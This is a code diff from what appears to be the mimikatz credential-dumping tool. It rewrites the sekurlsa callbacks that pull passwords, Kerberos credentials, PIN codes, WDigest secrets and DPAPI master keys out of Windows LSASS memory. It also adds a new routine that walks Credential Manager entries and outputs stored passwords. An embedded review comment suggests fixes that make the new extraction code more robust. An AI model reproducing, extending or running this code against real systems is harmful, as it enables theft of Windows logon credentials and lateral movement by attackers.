if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL))
|
||||
{
|
||||
aLsass.address = SspCredentialList;
|
||||
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
|
||||
@ -53,10 +53,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEX
|
||||
{
|
||||
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
kprintf(L"\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
}
|
||||
aLsass.address = mesCredentials.Flink;
|
||||
}
|
||||
|
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
|
||||
struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
|
||||
|
@ -33,19 +33,19 @@ LONG kuhl_m_sekurlsa_tspkg_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_tspkg_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
PVOID buffer = NULL;
|
||||
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = TSGlobalCredTable;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL)))
|
||||
{
|
||||
@ -53,7 +53,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONT
|
||||
{
|
||||
aLocalMemory.address = &primaryCredential;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
|
||||
PVOID unk0; // lock ?
|
||||
|
@ -40,22 +40,22 @@ LONG kuhl_m_sekurlsa_wdigest_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID sta
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_wdigest_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
SIZE_T taille;
|
||||
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, sizeof(WDigestReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &l_LogSessList, NULL, &offsetWDigestPrimary))
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, sizeof(WDigestReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &l_LogSessList, NULL, &offsetWDigestPrimary))
|
||||
{
|
||||
aLsassMemory.address = l_LogSessList;
|
||||
taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, taille))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, taille))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + offsetWDigestPrimary), logId, 0, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + offsetWDigestPrimary), pData->LogonId, 0, externalCallback, externalCallbackData);
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
|
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
|
||||
struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
|
||||
|
@ -6,11 +6,11 @@
|
||||
#include "kuhl_m_sekurlsa_packages.h"
|
||||
|
||||
const ANSI_STRING PRIMARY_STRING = {7, 8, "Primary"}, CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pCredentials;
|
||||
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials;
|
||||
DWORD flags;
|
||||
|
||||
while(pCreds)
|
||||
@ -34,7 +34,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
else
|
||||
flags = 0;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
|
||||
|
||||
LocalFree(primaryCredentials.Primary.Buffer);
|
||||
}
|
||||
@ -48,65 +48,65 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_KERBEROS_LOGON_SESSION session;
|
||||
UNICODE_STRING pinCode;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &session, sizeof(KIWI_KERBEROS_LOGON_SESSION), NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, logId, 0);
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, pData->LogonId, 0);
|
||||
if(session.pinCode)
|
||||
if(ReadMemory((ULONG_PTR) session.pinCode, &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, logId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
}
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pLiveGlobalLogonSessionList, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pLiveGlobalLogonSessionList, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &credentials, sizeof(KIWI_LIVESSP_LIST_ENTRY), NULL))
|
||||
if(ptr = (ULONG_PTR) credentials.suppCreds)
|
||||
if(ReadMemory(ptr, &primaryCredential, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (NtBuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, (NtBuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
|
||||
} else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pTSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pTSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &credentials, sizeof(KIWI_TS_CREDENTIAL), NULL))
|
||||
if(ReadMemory((ULONG_PTR) credentials.pTsPrimary, &primaryCredential, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
ULONG_PTR ptr;
|
||||
BYTE buffer[offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL)];
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pl_LogSessList, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pl_LogSessList, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, buffer, sizeof(buffer), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (buffer + offsetWDigestPrimary), logId, 0);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (buffer + offsetWDigestPrimary), pData->LogonId, 0);
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
ULONG_PTR ptr;
|
||||
@ -118,10 +118,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
|
||||
{
|
||||
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), NULL))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
}
|
||||
ptr = (ULONG_PTR) mesCredentials.Flink;
|
||||
}
|
||||
@ -131,7 +131,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
|
||||
ULONG_PTR ptr;
|
||||
@ -145,7 +145,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
{
|
||||
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
@ -168,3 +168,76 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
const CREDMAN_INFOS credhelper[] = {
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_60),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, encPassword),
|
||||
},
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
ULONG_PTR pCur, pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
PBYTE buffer;
|
||||
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 0;
|
||||
else
|
||||
CredOffsetIndex = 1;
|
||||
|
||||
if(pData->pCredentialManager)
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) pData->pCredentialManager, &setList, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY), NULL))
|
||||
{
|
||||
if(setList.list1)
|
||||
{
|
||||
pRef = (ULONG_PTR) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
|
||||
if(ReadMemory((ULONG_PTR) setList.list1, &listStarter, sizeof(KIWI_CREDMAN_LIST_STARTER), NULL))
|
||||
{
|
||||
if(buffer = (PBYTE) LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
if(pCur = (ULONG_PTR) listStarter.start)
|
||||
{
|
||||
while(pCur != pRef)
|
||||
{
|
||||
pCur -= credhelper[CredOffsetIndex].offsetFLink;
|
||||
if(ReadMemory(pCur, buffer, credhelper[CredOffsetIndex].structSize, NULL))
|
||||
{
|
||||
dprintf("\n\t [%08x]", nbCred);
|
||||
kiwiCreds.UserName = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetUsername);
|
||||
kiwiCreds.Domaine = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetDomain);
|
||||
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) (buffer + credhelper[CredOffsetIndex].offsetCbPassword);;
|
||||
kiwiCreds.Password.Buffer = *(PWSTR *) (buffer + credhelper[CredOffsetIndex].offsetPassword);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS);
|
||||
pCur = (ULONG_PTR) *(PVOID *) (buffer + credhelper[CredOffsetIndex].offsetFLink);
|
||||
}
|
||||
else break;
|
||||
nbCred++;
|
||||
}
|
||||
}
|
||||
LocalFree(buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
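Review bot: In the new `kuhl_m_sekurlsa_enum_logon_callback_credman`, the password length is read through a `PUSHORT` at `offsetCbPassword`, but that offset is built from `cbEncPassword`, which the struct definitions added in the header hunk declare as `ULONG`, so the value is silently narrowed to 16 bits; `kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = (USHORT) *(PULONG) (buffer + credhelper[CredOffsetIndex].offsetCbPassword);` (which also drops the stray `;;`) would make the narrowing deliberate and the source width honest. The `while(pCur != pRef)` walk has no iteration cap, so a corrupted or cyclic `Flink` chain in the target keeps it spinning; the other list walks on this page share that property, but this one is newly added and could take a bounded counter. `kiwiCreds` is only assigned `UserName`, `Domaine` and `Password` before being passed to `kuhl_m_sekurlsa_genericCredsOutput`; if `KIWI_GENERIC_PRIMARY_CREDENTIAL` has further members they go out uninitialized — that struct is not visible here, so this is a point to confirm.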
|
@ -6,13 +6,14 @@
|
||||
#pragma once
|
||||
#include "kwindbg.h"
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
